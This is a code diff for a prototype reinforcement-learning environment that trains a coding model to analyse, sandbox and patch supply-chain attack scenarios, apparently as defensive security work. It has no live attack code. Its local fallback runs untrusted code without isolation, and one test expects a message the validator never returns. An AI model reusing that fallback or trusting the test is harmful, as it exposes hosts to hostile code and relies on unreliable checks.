+        "type": "true_positive",
+        "attack_type": "obfuscated_exec",
+        "code_snippet": "print('Hello from hidden exec!')\ndef add(a, b): return a + b",
+        "unit_test_code": "import code\nassert code.add(1, 2) == 3\n"
+    }
+    # Patch fails to remove the backdoor, only formats the code
+    patch = "print('Hello from hidden exec!')\ndef add(a, b):\n    return a + b\n"
+    success, msg, details = validate_patch(scenario, patch, use_docker=False)
+    assert success is False
+    assert msg == "Vulnerability remains"
+    assert "evidence" in details
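
The tests above pin down the `(success, msg, details)` contract of `validate_patch`, whose implementation is not shown in this part of the diff. As an illustration only, a first validation stage that would satisfy `test_syntax_error_detected` could look like the sketch below; `check_patch_syntax` and the `"Syntax OK"` message are assumptions, not the repository's code.

```python
import ast


def check_patch_syntax(patch):
    """Hypothetical first stage of patch validation: reject code that does not parse."""
    try:
        ast.parse(patch)
    except SyntaxError as exc:
        # Same tuple shape as the tests expect: (success, msg, details).
        return False, "Syntax error", {"error": f"{exc.msg} (line {exc.lineno})"}
    return True, "Syntax OK", {}


ok, msg, details = check_patch_syntax("print('hello")  # missing closing quote
print(ok, msg)
```

Parsing with `ast.parse` never executes the patch, so this stage is safe to run outside the sandbox before any unit test or Docker step.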

sentinel_synth/training/__init__.py ADDED

File without changes

sentinel_synth/training/train_grpo.py ADDED

	@@ -0,0 +1,187 @@

+import os
+import argparse
+import numpy as np
+try:
+    import wandb
+except ImportError:
+    wandb = None
+# In a real environment, we would also import:
+# from unsloth import FastLanguageModel
+# from trl import GRPOTrainer, GRPOConfig
+# But for the hackathon prototype and safe execution without massive deps,
+# we use mock classes in dry-run mode if the real ones aren't available.
+from ..envs.sentinel_env import SentinelEnv
+def train_agent(args):
+    """
+    Main training loop for Sentinel-Synth GRPO.
+    """
+    # 1. Setup WandB
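+    if args.dry_run:
+        print("[DRY RUN] WandB initialization skipped.")
+    elif wandb is None:
+        # The import above is optional, so guard against a missing package
+        print("wandb is not installed; WandB initialization skipped.")
+    else:
+        wandb.init(project="sentinel-synth", name="grpo-qwen2.5-coder-7b", config=vars(args))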
+    # 2. Load Environment
+    env = SentinelEnv(use_docker=args.use_docker)
+    print(f"Loaded environment with {len(env.scenarios)} scenarios.")
+    # 3. Load Model (Mock or unsloth)
+    if args.dry_run:
+        print("[DRY RUN] Loading dummy model instead of Qwen2.5-Coder-7B in 4-bit...")
+        def dummy_policy(obs):
+            # Deterministic dummy policy for dry runs
+            risk = obs["risk_score"][0]
+            if risk > 0.5:
+                return 3 # ACTION_SUBMIT_PATCH
+            return 0 # ACTION_ANALYZE
+        # 4. Dummy Training Loop
+        epochs = 3
+        batch_size = 4
+        for epoch in range(epochs):
+            print(f"--- Epoch {epoch+1}/{epochs} ---")
+            total_rewards = []
+            for batch_idx in range(len(env.scenarios) // batch_size):
+                trajectories = []
+                for g in range(args.group_size):
+                    obs, _ = env.reset()
+                    done = False
+                    trajectory_reward = 0
+                    steps = 0
+                    while not done and steps < env.max_steps:
+                        action = dummy_policy(obs)
+                        obs, reward, done, _, info = env.step(action)
+                        trajectory_reward += reward
+                        steps += 1
+                    trajectories.append(trajectory_reward)
+                # Mock GRPO Advantage calculation
+                mean_reward = np.mean(trajectories)
+                std_reward = np.std(trajectories) + 1e-8
+                advantages = [(r - mean_reward) / std_reward for r in trajectories]
+                total_rewards.append(mean_reward)
+                print(f"Batch {batch_idx}: Mean Reward: {mean_reward:.2f}, Advantages: {[f'{a:.2f}' for a in advantages]}")
+            print(f"Epoch {epoch+1} Mean Reward: {np.mean(total_rewards):.2f}")
+            # No wandb logging here: this loop only runs in dry-run mode.
+        print("[DRY RUN] Training complete. No adapter is written in dry-run mode.")
+    else:
+        print("Initializing true GRPO training with trl and unsloth...")
+        try:
+            from unsloth import FastLanguageModel
+            from unsloth import is_bfloat16_supported
+            from trl import GRPOTrainer, GRPOConfig
+            from datasets import Dataset
+            max_seq_length = args.max_seq_len
+            model, tokenizer = FastLanguageModel.from_pretrained(
+                model_name="unsloth/Qwen2.5-Coder-7B-Instruct",
+                max_seq_length=max_seq_length,
+                load_in_4bit=True,
+            )
+            model = FastLanguageModel.get_peft_model(
+                model,
+                r=16,
+                target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
+                                "gate_proj", "up_proj", "down_proj"],
+                lora_alpha=16,
+                lora_dropout=0,
+                bias="none",
+                use_gradient_checkpointing="unsloth",
+                random_state=3407,
+            )
+            # Formulate training as text completion: the model writes its reasoning
+            # and an <action> tag, and GRPO scores each completion with the reward
+            # function defined below.
+            import re
+            def env_reward_function(completions, prompts, **kwargs):
+                """
+                Extracts chosen action, runs env, returns reward array.
+                Matches completions to their corresponding scenario from prompts.
+                """
+                rewards = []
+                for prompt, completion in zip(prompts, completions):
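+                    # Extract the action from the completion using a regex.
+                    # Plain-string prompts yield string completions; conversational
+                    # prompts yield a list of message dicts.
+                    text = completion if isinstance(completion, str) else completion[0]["content"]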
+                    match = re.search(r"<action>(\d+)</action>", text)
+                    if match:
+                        try:
+                            action = int(match.group(1))
+                        except ValueError:
+                            action = SentinelEnv.ACTION_ANALYZE
+                    else:
+                        action = SentinelEnv.ACTION_ANALYZE
+                    # Find which scenario this prompt belongs to
+                    # (In a real setup we'd pass IDs, here we search by substring)
+                    target_scenario = None
+                    for s in env.scenarios:
+                        if s["code_snippet"][:100] in prompt:
+                            target_scenario = s
+                            break
+                    if not target_scenario:
+                        rewards.append(0.0)
+                        continue
+                    # Reset env with this specific scenario
+                    obs, info = env.reset(options={"scenario": target_scenario})
+                    _, reward, _, _, _ = env.step(action)
+                    rewards.append(reward)
+                return rewards
+            # We need a proper dataset of prompts
+            prompt_data = [{"prompt": f"Analyze this Python code for supply-chain vulnerabilities.\n<code_snippet>\n{s['code_snippet']}\n</code_snippet>\nYour response MUST include a thought process in <thought> tags and a final action (0-4) in <action> tags.\n0: ANALYZE, 1: EXECUTE_SANDBOX, 2: BLOCK_PR, 3: SUBMIT_PATCH, 4: REQUEST_REVIEW."} for s in env.scenarios]
+            dataset = Dataset.from_list(prompt_data)
+            training_args = GRPOConfig(
+                output_dir="grpo_lora",
+                learning_rate=args.learning_rate,
+                per_device_train_batch_size=1,
+                gradient_accumulation_steps=args.gradient_accumulation_steps,
+                max_prompt_length=args.max_seq_len // 2,
+                max_completion_length=args.max_seq_len // 2,
+                num_generations=args.group_size,
+                max_steps=args.max_steps,
+                save_steps=50,
+                logging_steps=10,
+                report_to="wandb",
+            )
+            trainer = GRPOTrainer(
+                model=model,
+                reward_funcs=[env_reward_function],
+                args=training_args,
+                train_dataset=dataset,
+            )
+            trainer.train()
+            model.save_pretrained_merged("grpo_lora", tokenizer, save_method="lora")
+            print("Training complete and adapter saved.")
+        except ImportError as e:
+            print(f"Skipping standard training fallback. Missing required dependency: {e}")
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--dry-run", action="store_true", help="Run with mock components without GPU.")
+    parser.add_argument("--use-docker", action="store_true", help="Use Docker for execution fallback in env.")
+    parser.add_argument("--learning-rate", type=float, default=1e-6)
+    parser.add_argument("--group-size", type=int, default=4)
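+    parser.add_argument("--max-seq-len", type=int, default=1024)
+    # train_agent also reads these two attributes; the defaults are assumptions that mirror
+    # the Hugging Face TrainingArguments defaults.
+    parser.add_argument("--gradient-accumulation-steps", type=int, default=1)
+    parser.add_argument("--max-steps", type=int, default=-1)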
+    args = parser.parse_args()
+    train_agent(args)
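
The reward function above turns a model completion into an environment action by reading the `<action>` tag. A minimal, standalone sketch of that parsing step follows. It assumes the five action ids listed in the prompt (0 to 4); `ACTION_ANALYZE`, `NUM_ACTIONS`, `completion_text`, and `parse_action` are hypothetical names used only for illustration, and the range check is an addition that the original code does not perform.

```python
import re

# Hypothetical constants mirroring the action ids listed in the prompt (0-4).
ACTION_ANALYZE = 0
NUM_ACTIONS = 5


def completion_text(completion):
    """Return the generated text for a plain-string or chat-style completion."""
    if isinstance(completion, str):
        return completion
    # Chat-style: a list of {"role": ..., "content": ...} messages.
    return completion[0]["content"]


def parse_action(completion, default=ACTION_ANALYZE):
    """Extract the integer inside <action>...</action>, else return `default`."""
    match = re.search(r"<action>\s*(\d+)\s*</action>", completion_text(completion))
    if not match:
        return default
    action = int(match.group(1))
    # Reject ids outside the known action space instead of passing them to the env.
    return action if 0 <= action < NUM_ACTIONS else default
```

Keeping the parser separate from the reward loop makes the fallback behaviour easy to unit test without a model or an environment.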

sentinel_synth/validation/__init__.py ADDED

File without changes

sentinel_synth/validation/docker_runner.py ADDED

	@@ -0,0 +1,107 @@

+import os
+import tempfile
+import subprocess
+import shutil
+# use_docker=False provides a fallback for environments where Docker isn't available or running yet.
+def run_code(code: str, timeout_sec: int = 5, use_docker: bool = True) -> dict:
+    """
+    Executes Python code in an isolated environment.
+    If use_docker is True, runs in `sentinel-sandbox:latest`.
+    If False, runs locally using subprocess (UNSAFE for real workloads, but fine for demo/dev).
+    """
+    temp_dir = tempfile.mkdtemp(prefix="sentinel_sandbox_")
+    script_path = os.path.join(temp_dir, "script.py")
+    with open(script_path, "w") as f:
+        f.write(code)
+    result = {
+        "stdout": "",
+        "stderr": "",
+        "exit_code": -1,
+        "network_blocked": use_docker,
+        "file_writes": []
+    }
+    try:
+        if use_docker:
+            # We assume docker CLI is available.
+            # `docker run --rm --network none --memory 256m --cpus 0.5 -v temp_dir:/app sentinel-sandbox python /app/script.py`
+            cmd = [
+                "docker", "run", "--rm",
+                "--network", "none",
+                "--memory", "256m",
+                "--cpus", "0.5",
+                "-v", f"{temp_dir}:/app",
+                "sentinel-sandbox:latest",
+                "python", "/app/script.py"
+            ]
+        else:
+            # Local fallback (UNSAFE but necessary if Docker is unavailable)
+            cmd = ["python3", script_path]
+        process = subprocess.run(
+            cmd,
+            capture_output=True,
+            text=True,
+            timeout=timeout_sec
+        )
+        result["stdout"] = process.stdout
+        result["stderr"] = process.stderr
+        result["exit_code"] = process.returncode
+        # Check if the code wrote any *new* files to the temp dir
+        for filename in os.listdir(temp_dir):
+            if filename != "script.py":
+                result["file_writes"].append(filename)
+    except subprocess.TimeoutExpired as e:
+        result["stderr"] = "Execution timed out."
+        # Preserve any partial output captured before the timeout, in either execution mode.
+        if e.stdout:
+            result["stdout"] = e.stdout.decode('utf-8', errors='ignore') if isinstance(e.stdout, bytes) else e.stdout
+    except Exception as e:
+        result["stderr"] = f"Execution error: {str(e)}"
+    finally:
+        shutil.rmtree(temp_dir, ignore_errors=True)
+    return result
+def check_syntax(code: str, use_docker: bool = True) -> tuple[bool, str]:
+    """Check python syntax of the code without fully executing it."""
+    temp_dir = tempfile.mkdtemp(prefix="sentinel_syntax_")
+    script_path = os.path.join(temp_dir, "script.py")
+    with open(script_path, "w") as f:
+        f.write(code)
+    try:
+        if use_docker:
+            cmd = [
+                "docker", "run", "--rm",
+                "-v", f"{temp_dir}:/app",
+                "sentinel-sandbox:latest",
+                "python", "-m", "py_compile", "/app/script.py"
+            ]
+        else:
+            cmd = ["python3", "-m", "py_compile", script_path]
+        process = subprocess.run(
+            cmd,
+            capture_output=True,
+            text=True,
+            timeout=5
+        )
+        if process.returncode == 0:
+            return True, ""
+        else:
+            return False, process.stderr
+    except subprocess.TimeoutExpired:
+         return False, "Syntax check timed out"
+    except Exception as e:
+         return False, f"Syntax check failed: {e}"
+    finally:
+         shutil.rmtree(temp_dir, ignore_errors=True)
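
`check_syntax` above compiles the script in a subprocess or container. As a lighter-weight alternative, a syntax-only check can be sketched in-process with the built-in `compile()`, which parses the source without executing it. This is a sketch under stated assumptions, not the project's method: `check_syntax_inprocess` is a hypothetical name, and the check uses the host interpreter's grammar, which may differ from the Python version inside `sentinel-sandbox:latest`.

```python
def check_syntax_inprocess(code: str) -> tuple[bool, str]:
    """Return (is_valid, error_message) without running the code."""
    try:
        # compile() only parses and builds a code object; nothing is executed.
        compile(code, "<patch>", "exec")
    except SyntaxError as exc:
        return False, f"{exc.msg} (line {exc.lineno})"
    except ValueError as exc:
        # Raised by some Python versions for source containing null bytes.
        return False, str(exc)
    return True, ""
```

The return shape matches `check_syntax`, so a caller could try this check first and fall back to the sandboxed one when version fidelity matters.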

sentinel_synth/validation/patch_validator.py ADDED

	@@ -0,0 +1,87 @@

+from .docker_runner import run_code, check_syntax
+def validate_patch(scenario: dict, patch_code: str, use_docker: bool = True) -> tuple[bool, str, dict]:
+    """
+    Validates a patch using a 3-step pipeline:
+    1. Syntax Check
+    2. Unit Test Execution
+    3. Re-attack (Vulnerability Verification)
+    Returns: (success, message, details_dict)
+    """
+    details = {}
+    # 1. Syntax Check
+    is_valid, err_msg = check_syntax(patch_code, use_docker=use_docker)
+    if not is_valid:
+        details["error"] = err_msg
+        return False, "Syntax error", details
+    # 2. Unit Test Execution
+    if scenario.get("unit_test_code"):
+        # We need to run the unit test code.
+        # test.py contains something like: "import code; assert code.func() == expected"
+        # We write patched code to a module 'code.py', and run 'test.py'
+        # We can construct a combined script that writes the 'code' module dynamically,
+        # or we just embed the patched code and the test code in one unified runner.
+        # Easiest way in a single file runner (since docker_runner runs a single script):
+        combined_script = f"""import sys
+import types
+# Create a mock 'code' module
+module = types.ModuleType('code')
+exec({patch_code!r}, module.__dict__)
+sys.modules['code'] = module
+# Run the unit test
+{scenario['unit_test_code']}
+print("TEST_SUCCESS")
+"""
+        result = run_code(combined_script, timeout_sec=5, use_docker=use_docker)
+        if result["exit_code"] != 0 or "TEST_SUCCESS" not in result["stdout"]:
+            details["test_output"] = result["stderr"] if result["stderr"] else result["stdout"]
+            return False, "Unit test failed", details
+    # 3. Re-attack (Vulnerability Verification)
+    if scenario["type"] == "true_positive" and scenario.get("attack_type"):
+        # Run original code snippet to get baseline malicious behavior
+        attack_result = run_code(scenario["code_snippet"], timeout_sec=5, use_docker=use_docker)
+        # Run patched code
+        patch_result = run_code(patch_code, timeout_sec=5, use_docker=use_docker)
+        vulnerability_remains = False
+        # Generic heuristic: Did the patch reduce suspicious side-effects?
+        # 1. Compare file writes (malicious often creates/modifies files)
+        attack_writes = attack_result.get("file_writes", [])
+        patch_writes = patch_result.get("file_writes", [])
+        # If the attack wrote files and the patch still writes as many or more, treat it as unpatched.
+        if attack_writes and len(patch_writes) >= len(attack_writes):
+            vulnerability_remains = True
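+        # 2. Compare network attempts (if telemetry includes it).
+        # `network_blocked` only records that the sandbox disabled networking, so under Docker it is
+        # True for both runs and cannot signal a remaining vulnerability. `network_attempted` is an
+        # assumed telemetry field that run_code does not populate yet; the check is inert until it does.
+        if patch_result.get("network_attempted") and attack_result.get("network_attempted"):
+            vulnerability_remains = True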
+        # 3. Specific attack type checks (refined)
+        if scenario["attack_type"] == "typosquatting":
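+            # A missing module surfaces as ModuleNotFoundError, a subclass of ImportError.
+            if ("ImportError" in patch_result["stderr"] or "ModuleNotFoundError" in patch_result["stderr"]) and "pythonn" in patch_result["stderr"]: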
+                vulnerability_remains = True
+        elif scenario["attack_type"] == "obfuscated_exec":
+            # If the patch still produces the same specific output as the obfuscated one
+            if attack_result["stdout"].strip() != "" and patch_result["stdout"] == attack_result["stdout"]:
+                 vulnerability_remains = True
+        if vulnerability_remains:
+            details["evidence"] = {
+                "attack_telemetry": attack_result,
+                "patch_telemetry": patch_result
+            }
+            return False, "Vulnerability still accessible", details
+    details["validation_log"] = "All checks passed successfully."
+    return True, "Patch is valid", details
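
The unit-test step above builds one script that loads the patch as a module named `code` and then runs the test body. A minimal sketch of that construction follows, assuming the patch source is embedded with `repr()` so that quotes, triple quotes, and backslashes inside the patch cannot terminate the string literal early. `build_runner` is a hypothetical helper name, not part of the repository.

```python
def build_runner(patch_code: str, test_code: str) -> str:
    """Build a single script that exposes patch_code as module 'code', then runs test_code."""
    return (
        "import sys, types\n"
        "module = types.ModuleType('code')\n"
        # repr() yields a valid Python string literal for any source text.
        f"exec({patch_code!r}, module.__dict__)\n"
        "sys.modules['code'] = module\n"
        f"{test_code}\n"
        'print("TEST_SUCCESS")\n'
    )
```

The resulting string can be passed to a runner such as `run_code`. Note that registering a module called `code` shadows the standard-library module of the same name inside the generated script.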

setup.py ADDED

	@@ -0,0 +1,15 @@

+from setuptools import setup, find_packages
+setup(
+    name="sentinel_synth",
+    version="0.1.0",
+    packages=find_packages(),
+    install_requires=[
+        "gymnasium>=0.29.0",
+        "docker>=7.0.0",
+        "streamlit>=1.30.0",
+        "wandb>=0.16.0",
+        "pytest>=8.0.0",
+        "synthetic-data-kit>=0.1.0"
+    ]
+)